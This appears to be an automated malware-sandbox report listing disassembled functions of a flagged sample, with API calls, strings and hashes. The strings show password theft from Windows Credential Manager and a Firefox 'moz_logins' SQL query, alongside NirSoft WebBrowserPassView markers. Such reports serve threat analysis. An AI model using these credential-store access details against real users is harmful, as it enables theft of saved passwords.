                                                  • Opcode ID: 620f7fb1875e6c1fe369c72aee23538108181ed26fa9b0cca4b6b71503556dd6
                                                  • Instruction ID: 16f3a03532fd71bf7b987582fee040d1dd7fa58dea07b6b8c7b27d1037cf047a
                                                  • Opcode Fuzzy Hash: 620f7fb1875e6c1fe369c72aee23538108181ed26fa9b0cca4b6b71503556dd6
                                                  • Instruction Fuzzy Hash: 92F0F474605321A9A3108BA8BD00BA72FF86781F52B10013BED00D1266DBBCD8C29F7E
                                                  Uniqueness
                                                  • Uniqueness Score: -1.00%
                                                  APIs
                                                    • Part of subcall function 0040383E: FreeLibrary.KERNEL32(?,004037CB,00000000,00408635,?,00000000,?), ref: 00403845
                                                  • LoadLibraryW.KERNEL32(advapi32.dll,00000000,00408635,?,00000000,?), ref: 004037D0
                                                  • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004037E9
                                                  • GetProcAddress.KERNEL32(?,CredFree), ref: 004037F5
                                                  • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00403801
                                                  • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040380D
                                                  • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00403819
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Library$FreeLoad
                                                  • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                  • API String ID: 2449869053-4258758744
                                                  • Opcode ID: cb87cb7b44b35881c8e04de2777173e0b76236c73d0c14512c4dcac4629ff988
                                                  • Instruction ID: c94656deef6b20b6b745ef32668947add9de3545ed3fb2bb9f52e7e7eb3e89f2
                                                  • Opcode Fuzzy Hash: cb87cb7b44b35881c8e04de2777173e0b76236c73d0c14512c4dcac4629ff988
                                                  • Instruction Fuzzy Hash: D9012C355007809AD730AF6AC809F06BEE4EF54B02B21886FF091A3791D7B9E240CF48
                                                  Uniqueness
                                                  • Uniqueness Score: -1.00%
                                                  APIs
                                                    • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                    • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                  • memset.MSVCRT ref: 00403415
                                                  • memset.MSVCRT ref: 0040342A
                                                  • memset.MSVCRT ref: 0040343F
                                                  • _snwprintf.MSVCRT ref: 00403467
                                                  • wcscpy.MSVCRT ref: 00403483
                                                  • _snwprintf.MSVCRT ref: 004034C6
                                                  Strings
                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 0040345A
                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004034B9
                                                  • WebBrowserPassView, xrefs: 004034AB
                                                  • <table dir="rtl"><tr><td>, xrefs: 0040347D
                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004033EF
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$_snwprintf$FileWritewcscpywcslen
                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$WebBrowserPassView
                                                  • API String ID: 2731979376-1376879643
                                                  • Opcode ID: f8e001787c2363cba2026e3d3c8ba2c251a00b45d532011988efd28241eb9acd
                                                  • Instruction ID: ae32d01ec2d3a7685ec326ba9a70c170c8059c8ae6e66fa8bd15e07dd33865c2
                                                  • Opcode Fuzzy Hash: f8e001787c2363cba2026e3d3c8ba2c251a00b45d532011988efd28241eb9acd
                                                  • Instruction Fuzzy Hash: 2E217672D002187ADB21AF55DC41FEA76BCEB08785F0040AFF509A6191DA799F848F69
                                                  Uniqueness
                                                  • Uniqueness Score: -1.00%
                                                  APIs
                                                  • SetBkMode.GDI32(?,00000001), ref: 0040DE90
                                                  • SetTextColor.GDI32(?,00FF0000), ref: 0040DE9E
                                                  • SelectObject.GDI32(?,?), ref: 0040DEB3
                                                  • DrawTextExW.USER32(?,?,000000FF,?,00000004,?), ref: 0040DEE9
                                                  • SelectObject.GDI32(00000014,00000000), ref: 0040DEF3
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040DF0E
                                                  • LoadCursorW.USER32(00000000,00000067), ref: 0040DF17
                                                  • SetCursor.USER32(00000000), ref: 0040DF1E
                                                  • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 0040DF64
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CursorObjectSelectText$ColorDrawHandleLoadMessageModeModulePost
                                                  • String ID: WebBrowserPassView
                                                  • API String ID: 101102110-2171583229
                                                  • Opcode ID: d30b9dbd8ebc4ebaeb5335cce5274ca5fb8e94d47e078bea0be9f04dbaba8f28
                                                  • Instruction ID: 5844c3f8be721e5f4358c4987d475350c1bb70f51af30b4dfd416207439779ca
                                                  • Opcode Fuzzy Hash: d30b9dbd8ebc4ebaeb5335cce5274ca5fb8e94d47e078bea0be9f04dbaba8f28
                                                  • Instruction Fuzzy Hash: D451D431A00206ABDB10AFA4C845F6AB7A6BF44315F20853AF507B72E0C779AD15DB99
                                                  Uniqueness
                                                  • Uniqueness Score: -1.00%
                                                  APIs
                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,004094E9,?,?,00409553,00000000), ref: 0040933D
                                                    • Part of subcall function 00407BD1: SetFilePointer.KERNEL32(00409553,?,00000000,00000000,?,0040935E,00000000,00000000,?,00000020,?,004094E9,?,?,00409553,00000000), ref: 00407BDE
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040936D
                                                    • Part of subcall function 0040928C: _memicmp.MSVCRT ref: 004092A6
                                                    • Part of subcall function 0040928C: memcpy.MSVCRT ref: 004092BD
                                                  • memcpy.MSVCRT ref: 004093B4
                                                  • strchr.MSVCRT ref: 004093D9
                                                  • strchr.MSVCRT ref: 004093EA
                                                  • _strlwr.MSVCRT ref: 004093F8
                                                  • memset.MSVCRT ref: 00409413
                                                  • CloseHandle.KERNEL32(00000000), ref: 00409460
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                  • String ID: 4$h
                                                  • API String ID: 4066021378-1856150674
                                                  • Opcode ID: 5c9b1e76fbe1022800f84db5655dab790c3d9ef423dba09cd133e7d04b6bc347
                                                  • Instruction ID: cde85974a53443ad19b2097b399cb4fe7e1f14935bf37b0ef0624c00476b394c
                                                  • Opcode Fuzzy Hash: 5c9b1e76fbe1022800f84db5655dab790c3d9ef423dba09cd133e7d04b6bc347
                                                  • Instruction Fuzzy Hash: 333186B1900118BEEB11EB54CC85BEE77ACEF04358F10406AFA08E6181D7789F558B69
                                                  Uniqueness
                                                  • Uniqueness Score: -1.00%
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$_snwprintf
                                                  • String ID: %%0.%df
                                                  • API String ID: 3473751417-763548558
                                                  • Opcode ID: 4b41fd37f03522ed39b57e73efbb1f6ad9b07295744d2b5ffc828d63613b1bc3
                                                  • Instruction ID: 8dc9084977ea8e099579ef4c9ca95b08d60ceca6feee4e1064a0b0e4f5e47a8f
                                                  • Opcode Fuzzy Hash: 4b41fd37f03522ed39b57e73efbb1f6ad9b07295744d2b5ffc828d63613b1bc3
                                                  • Instruction Fuzzy Hash: 79313E71800229BAEB20DF55DC85FEBBBBCFF49308F4000EAB609A2151D7749B94CB65
                                                  Uniqueness
                                                  • Uniqueness Score: -1.00%
                                                  APIs
                                                  • wcschr.MSVCRT ref: 00410E0E
                                                  • wcscpy.MSVCRT ref: 00410E1E
                                                    • Part of subcall function 00407278: wcslen.MSVCRT ref: 00407287
                                                    • Part of subcall function 00407278: wcslen.MSVCRT ref: 00407291
                                                    • Part of subcall function 00407278: _memicmp.MSVCRT ref: 004072AC
                                                  • wcscpy.MSVCRT ref: 00410E6D
                                                  • wcscat.MSVCRT ref: 00410E78
                                                  • memset.MSVCRT ref: 00410E54
                                                    • Part of subcall function 00407723: GetWindowsDirectoryW.KERNEL32(00451698,00000104,?,00410EAD,?,?,00000000,00000208,?), ref: 00407739
                                                    • Part of subcall function 00407723: wcscpy.MSVCRT ref: 00407749
                                                  • memset.MSVCRT ref: 00410E9C
                                                  • memcpy.MSVCRT ref: 00410EB7
                                                  • wcscat.MSVCRT ref: 00410EC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                  • String ID: \systemroot
                                                  • API String ID: 4173585201-1821301763
                                                  • Opcode ID: a0bd60bd2b0e165453e177ad0a7c90215dc3e7af33d93e9088b0359243bc96d3
                                                  • Instruction ID: 1a8d2db1a324573a28d88b24eeb1ed9c65cf0fc221c6a4ee7099d5d8ca3d40a6
                                                  • Opcode Fuzzy Hash: a0bd60bd2b0e165453e177ad0a7c90215dc3e7af33d93e9088b0359243bc96d3
                                                  • Instruction Fuzzy Hash: B121F9B280530479E621E7628D86EEB63EC9F05754F60455FF119E2082FABCA6C58B1E
                                                  Uniqueness
                                                  • Uniqueness Score: -1.00%
                                                  APIs
                                                    • Part of subcall function 00441975: memset.MSVCRT ref: 004419A0
                                                    • Part of subcall function 00441975: wcscpy.MSVCRT ref: 004419B7
                                                    • Part of subcall function 00441975: memset.MSVCRT ref: 004419EA
                                                    • Part of subcall function 00441975: wcscpy.MSVCRT ref: 00441A00
                                                    • Part of subcall function 00441975: wcscat.MSVCRT ref: 00441A11
                                                    • Part of subcall function 00441975: wcscpy.MSVCRT ref: 00441A37
                                                    • Part of subcall function 00441975: wcscat.MSVCRT ref: 00441A48
                                                    • Part of subcall function 00441975: wcscpy.MSVCRT ref: 00441A6F
                                                    • Part of subcall function 00441975: wcscat.MSVCRT ref: 00441A80
                                                    • Part of subcall function 00441975: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,00000000), ref: 00441A8F
                                                    • Part of subcall function 00441975: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,00000104,00000000), ref: 00441AA6
                                                    • Part of subcall function 00441975: GetProcAddress.KERNEL32(?,sqlite3_open), ref: 00441AF3
                                                    • Part of subcall function 00441975: GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 00441AFF
                                                  • memset.MSVCRT ref: 004069BD
                                                    • Part of subcall function 00407DC0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,004028DC,?,?,00000003,00000000,00000000), ref: 00407DD9
                                                  • memset.MSVCRT ref: 00406A3C
                                                  • memset.MSVCRT ref: 00406A51
                                                  • strcpy.MSVCRT(?,00000000,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406AC4
                                                  • strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406ADA
                                                  • strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406AF0
                                                  • strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406B06
                                                  • strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406B1C
                                                  • strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406B32
                                                  • memset.MSVCRT ref: 00406B48
                                                  Strings
                                                  • SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 00406A03
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memsetstrcpy$wcscpy$wcscat$AddressProc$ByteCharHandleLibraryLoadModuleMultiWide
                                                  • String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins
                                                  • API String ID: 2096775815-1740008135
                                                  • Opcode ID: 8192c0fe8ba549a976583856fdff13a2ed89254f8bdc8aa75337d2af27a32240
                                                  • Instruction ID: 0d09ea3875aa138d6f02baa8234f1932a31c53e7e6ecd19b10853a161b4d72d0
                                                  • Opcode Fuzzy Hash: 8192c0fe8ba549a976583856fdff13a2ed89254f8bdc8aa75337d2af27a32240
                                                  • Instruction Fuzzy Hash: 6D61E9B2C0421EEEDF11AF91DC419DEBBB8EF04314F10406BF505B2191EA79AA94CF69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00414BCA: GetVersionExW.KERNEL32(?), ref: 00414BED
                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00415EDB
                                                  • malloc.MSVCRT ref: 00415EE6
                                                  • free.MSVCRT(?), ref: 00415EF6
                                                  • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00415F0A
                                                  • free.MSVCRT(?), ref: 00415F0F
                                                  • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00415F25
                                                  • malloc.MSVCRT ref: 00415F2D
                                                  • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00415F40
                                                  • free.MSVCRT(?), ref: 00415F45
                                                  • free.MSVCRT(?), ref: 00415F59
                                                  • free.MSVCRT(00000000,0044A338,00000000), ref: 00415F78
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: free$FullNamePath$malloc$Version
                                                  • String ID:
                                                  • API String ID: 3356672799-0
                                                  • Opcode ID: 61acd55b7f6f74b1de7cfca591009593a893279d718121bcb2ed6df4730cb7d0
                                                  • Instruction ID: 788494e2a8c2de429da1840323bde4c0a518de2f45811afbb62912a9d7d550b6
                                                  • Opcode Fuzzy Hash: 61acd55b7f6f74b1de7cfca591009593a893279d718121bcb2ed6df4730cb7d0
                                                  • Instruction Fuzzy Hash: F321CB71900108FFEB117FA5DD46CDFBBA9DF80368B20007BF404A2160EA785F809568
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • EmptyClipboard.USER32 ref: 0040736D
                                                    • Part of subcall function 00407144: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040738A
                                                  • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040739B
                                                  • GlobalLock.KERNEL32 ref: 004073A8
                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 004073BB
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004073CD
                                                  • SetClipboardData.USER32 ref: 004073D6
                                                  • GetLastError.KERNEL32 ref: 004073DE
                                                  • CloseHandle.KERNEL32(?), ref: 004073EA
                                                  • GetLastError.KERNEL32 ref: 004073F5
                                                  • CloseClipboard.USER32 ref: 004073FE
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                  • String ID:
                                                  • API String ID: 3604893535-0
                                                  • Opcode ID: ff4ef1d92d1a290ea301bbc8eaca8dcb04474945f762c75d88d1861bbfd53786
                                                  • Instruction ID: 70226e125eefff96fe42492f97b8668800667adb6f1e94a7dd2fd5f696112ff0
                                                  • Opcode Fuzzy Hash: ff4ef1d92d1a290ea301bbc8eaca8dcb04474945f762c75d88d1861bbfd53786
                                                  • Instruction Fuzzy Hash: E311423A904204FBE7105FB5EC4DA5E7F78EB06B52F204176FD02E5290DB749A01DB69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcscpy
                                                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                  • API String ID: 1284135714-318151290
                                                  • Opcode ID: 765507c601b4d8d2ba7194c2d8328fe19790b608763020fa3010f04483565392
                                                  • Instruction ID: 454bece2ea24cac32075296694d9d3cbfc4d611bf65854eebe1c10393ee0200f
                                                  • Opcode Fuzzy Hash: 765507c601b4d8d2ba7194c2d8328fe19790b608763020fa3010f04483565392
                                                  • Instruction Fuzzy Hash: 46F01D3329C746A0383D09680B06AFF1001E2127497B585D3A882E06D5C8FDCEF2F81F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                  • String ID: 0$6
                                                  • API String ID: 4066108131-3849865405
                                                  • Opcode ID: 1d39bbd5ff858052ee02b08f17fe13160222b35be18e4d09e9b30479f4b91e1d
                                                  • Instruction ID: 34000a492db7a65727c4d20bf870b817f1c48c155544aae5e12c30b4e9d7c158
                                                  • Opcode Fuzzy Hash: 1d39bbd5ff858052ee02b08f17fe13160222b35be18e4d09e9b30479f4b91e1d
                                                  • Instruction Fuzzy Hash: 64318B72408340AFDB20DF91D845A9BB7E8FF84354F00497EF948A2291E37ADA14CB5B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040E305,00000000), ref: 00403945
                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403957
                                                  • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040E305,00000000), ref: 0040396B
                                                  • #17.COMCTL32(?,00000002,?,?,?,0040E305,00000000), ref: 00403979
                                                  • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403996
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                  • API String ID: 2780580303-317687271
                                                  • Opcode ID: 60c968a06818d841dc3f94f16557b2d6df9d0dbd22d8837fd1ebe6fbdb2c419c
                                                  • Instruction ID: dc7e95600dee0bf6daca19896d95929b9e7fb1f9fe7c184dfd563e32ea829a14
                                                  • Opcode Fuzzy Hash: 60c968a06818d841dc3f94f16557b2d6df9d0dbd22d8837fd1ebe6fbdb2c419c
                                                  • Instruction Fuzzy Hash: 8501D1B67502117BE3111FB49C89B6B7EACDB42F4BB100139B502F2280DBB8CF05869C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(nss3.dll,00000000,?,?,74B057F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAC9
                                                  • GetModuleHandleW.KERNEL32(sqlite3.dll,?,74B057F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAD2
                                                  • GetModuleHandleW.KERNEL32(mozsqlite3.dll,?,74B057F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FADB
                                                  • FreeLibrary.KERNEL32(00000000,?,74B057F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAEA
                                                  • FreeLibrary.KERNEL32(00000000,?,74B057F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAF1
                                                  • FreeLibrary.KERNEL32(00000000,?,74B057F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAF8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHandleLibraryModule
                                                  • String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
                                                  • API String ID: 662261464-3550686275
                                                  • Opcode ID: d0d754f8fa980613d90b85c052ffa4ec5d0d6696dd4c8834489f6bf69c2357b0
                                                  • Instruction ID: c5d69885cf2e3d5474ff6b38c23ba8038bf1212ac087c8b68f6824d90ef94812
                                                  • Opcode Fuzzy Hash: d0d754f8fa980613d90b85c052ffa4ec5d0d6696dd4c8834489f6bf69c2357b0
                                                  • Instruction Fuzzy Hash: 1AE0D816B0132E669E2067F16C44D1B7E5CC892AE53150037A904A32408DEC5C0599F8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy$memchrmemset
                                                  • String ID: G"D$G"D
                                                  • API String ID: 1581201632-2001841848
                                                  • Opcode ID: 7575a319fd1e5a0cf748581ae524368e3baf011f309bc42e4df5649906151b93
                                                  • Instruction ID: 18be241936230d761fb3e4c1ab226db0ef0f42d77396bda2a3194a4a2a5a8e65
                                                  • Opcode Fuzzy Hash: 7575a319fd1e5a0cf748581ae524368e3baf011f309bc42e4df5649906151b93
                                                  • Instruction Fuzzy Hash: CE51E671900219ABDB10EF65CD85EEEB7BCAF44304F44446BFA49D7141E778EA48CB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetSystemMetrics.USER32 ref: 004078A9
                                                  • GetSystemMetrics.USER32 ref: 004078AF
                                                  • GetDC.USER32(00000000), ref: 004078BC
                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 004078CD
                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004078D4
                                                  • ReleaseDC.USER32 ref: 004078DB
                                                  • GetWindowRect.USER32 ref: 004078EE
                                                  • GetParent.USER32(?), ref: 004078F3
                                                  • GetWindowRect.USER32 ref: 00407910
                                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040796F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                  • String ID:
                                                  • API String ID: 2163313125-0
                                                  • Opcode ID: 27c47932f92ae397c529d5322f361d1abbe154fe8b4fd6afae4dd3e0e48430fe
                                                  • Instruction ID: 40da1e460122d0dbc2375826a99d02d2520f98ce936ed6642694246a0da552c1
                                                  • Opcode Fuzzy Hash: 27c47932f92ae397c529d5322f361d1abbe154fe8b4fd6afae4dd3e0e48430fe
                                                  • Instruction Fuzzy Hash: D3318176A00209AFDB04DFB8CC85AEEBBB9FB48351F150175E901F3290DA70AE418B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 00406878
                                                  • memset.MSVCRT ref: 0040688C
                                                  • strcpy.MSVCRT(?), ref: 004068A6
                                                  • strcpy.MSVCRT(?,?,?,?,?,?), ref: 004068EB
                                                  • strcpy.MSVCRT(?,00001000,?,?,?,?,?,?), ref: 004068FF
                                                  • strcpy.MSVCRT(?,?,?,00001000,?,?,?,?,?,?), ref: 00406912
                                                  • wcscpy.MSVCRT ref: 00406921
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,Rp@,00406D64), ref: 00406948
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,Rp@,00406D64), ref: 0040695E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strcpy$ByteCharMultiWidememset$wcscpy
                                                  • String ID: Rp@
                                                  • API String ID: 4248099071-3382320042
                                                  • Opcode ID: 671e59c8fe4c17755a702227dbfb0f671c225521712c780855f09c1fc1980107
                                                  • Instruction ID: 073529020724e05d4964247b7c64433db30515fb9166064be710f6d7ccb76f44
                                                  • Opcode Fuzzy Hash: 671e59c8fe4c17755a702227dbfb0f671c225521712c780855f09c1fc1980107
                                                  • Instruction Fuzzy Hash: 653141B290011DBFDB20DA55CC84FEA77BCFF09358F0445AAB919E3141DA74AA588F68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: free$wcslen
                                                  • String ID:
                                                  • API String ID: 3592753638-3916222277
                                                  • Opcode ID: a6abcb691fd1dabd2973f99fa54c7fcc296b45a854174555a7bdb068922a3314
                                                  • Instruction ID: 27dbad6a18cb5119fe9557e6abee58e32c1211c22f38b2cca10356837960f856
                                                  • Opcode Fuzzy Hash: a6abcb691fd1dabd2973f99fa54c7fcc296b45a854174555a7bdb068922a3314
                                                  • Instruction Fuzzy Hash: DA615770C0811AEBEF189F95E6895AEB771FF04305F60847FE442B62E0DBB84981CB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 004059F7: _wcsicmp.MSVCRT ref: 00405A28
                                                  • memset.MSVCRT ref: 00408CAF
                                                    • Part of subcall function 00405CF6: memset.MSVCRT ref: 00405DF2
                                                  • free.MSVCRT(000000FF,?,000000FF,00000000,00000104,74B5F560), ref: 00408D7D
                                                    • Part of subcall function 00408801: _wcsicmp.MSVCRT ref: 0040881A
                                                    • Part of subcall function 00408116: wcslen.MSVCRT ref: 00408125
                                                    • Part of subcall function 00408116: _memicmp.MSVCRT ref: 00408153
                                                  • _snwprintf.MSVCRT ref: 00408D49
                                                    • Part of subcall function 00407EDE: wcslen.MSVCRT ref: 00407EF0
                                                    • Part of subcall function 00407EDE: free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F16
                                                    • Part of subcall function 00407EDE: free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F39
                                                    • Part of subcall function 00407EDE: memcpy.MSVCRT ref: 00407F5D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                  • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                  • API String ID: 2804212203-2982631422
                                                  • Opcode ID: 7bd5ab009cbfd9fcdb96c191ae6412ae2e80316867491f73be5c6299af195905
                                                  • Instruction ID: ce292a4a65043f2a6a20625204029b960355a9169e5f8c073e361fa6e4a76ec5
                                                  • Opcode Fuzzy Hash: 7bd5ab009cbfd9fcdb96c191ae6412ae2e80316867491f73be5c6299af195905
                                                  • Instruction Fuzzy Hash: 1E313E72D00219AADF50EFA5DD85ADEB7B8AF04354F50017FA508B21C1DE78AE458F68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadMenuW.USER32 ref: 0040A83F
                                                    • Part of subcall function 0040A668: GetMenuItemCount.USER32 ref: 0040A67E
                                                    • Part of subcall function 0040A668: memset.MSVCRT ref: 0040A69D
                                                    • Part of subcall function 0040A668: GetMenuItemInfoW.USER32 ref: 0040A6D9
                                                    • Part of subcall function 0040A668: wcschr.MSVCRT ref: 0040A6F1
                                                  • DestroyMenu.USER32(00000000), ref: 0040A85D
                                                  • CreateDialogParamW.USER32 ref: 0040A8AB
                                                  • memset.MSVCRT ref: 0040A8C7
                                                  • GetWindowTextW.USER32 ref: 0040A8DC
                                                  • EnumChildWindows.USER32 ref: 0040A907
                                                  • DestroyWindow.USER32(00000000), ref: 0040A90E
